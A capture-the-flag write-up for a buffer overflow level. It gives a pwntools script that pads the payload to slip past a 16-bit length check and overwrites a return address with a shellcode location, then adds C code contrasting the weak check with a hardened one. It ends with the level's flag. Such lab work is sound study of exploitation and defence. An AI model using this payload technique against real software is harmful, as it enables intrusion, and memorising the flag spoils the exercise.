First, we can see that there are no protections, and ASLR is also disabled.

In this level we do a buffer overflow, but we also need to pass one check: the length of the buffer has to satisfy a specific rule.
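Here you can find the shellcode script, shellcode.py:

```python
import sys
from pwn import *

junk_size = 65282 + 4
shellcode_address = 0xffffd542  # address of the shellcode in the environment variable

payload = b'A' * junk_size
payload += p32(shellcode_address)

# Pad when the low 16 bits of the length exceed 0x3f.
if (len(payload) & 0xffff) > 0x003f:
    # `&` binds more loosely than `-` and `+`, so the original expression
    # evaluates as len & (0xffff - len + 0x10); the parentheses make that explicit.
    payload += b'A' * (len(payload) & (0xffff - len(payload) + 0x10))

args = (str(len(payload))).encode() + b' ' + payload
sys.stdout.buffer.write(args)
```

You need to change the address of the shellcode based on the address of your environment variable.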
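The script's `len(payload) & 0xffff` test implies that the level only compares the low 16 bits of the length. The C below is an added example, not code from this writeup or from the level's source (which the page does not show): it assumes the length is narrowed to a 16-bit type before being compared with 0x3f, and sets that weak check beside a full-width one. All function names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_LEN 0x3f   /* limit taken from the script's comparison */

/* Weak form (assumed): the length is narrowed to 16 bits first,
   so only its low 16 bits take part in the bounds test. */
int weak_length_ok(size_t len) {
    uint16_t narrowed = (uint16_t)len;   /* 0x1000a becomes 0x000a */
    return narrowed <= MAX_LEN;
}

/* Hardened form: compare the full-width value, no narrowing cast. */
int strict_length_ok(size_t len) {
    return len <= MAX_LEN;
}

/* Hardened copy: rejects any length that does not fit the destination
   (leaving room for the terminator). Returns 0 on success, -1 otherwise. */
int safe_copy(char *dst, size_t dst_size, const char *src, size_t len) {
    if (dst == NULL || src == NULL || dst_size == 0 || len >= dst_size)
        return -1;
    memcpy(dst, src, len);
    dst[len] = '\0';
    return 0;
}

int main(void) {
    /* Constructed sample lengths: a small one, the unpadded payload length
       from the script, and the padded length whose low 16 bits are 0x000a. */
    size_t samples[] = { 10, 65290, 0x1000a };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        printf("len=%#zx weak=%d strict=%d\n", samples[i],
               weak_length_ok(samples[i]), strict_length_ok(samples[i]));
    }
    return 0;
}
```

The fix is to keep the length in one wide unsigned type from parsing through to the copy, and to bound the copy by the destination size rather than by a separately checked value.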

Flag: vY134qxapL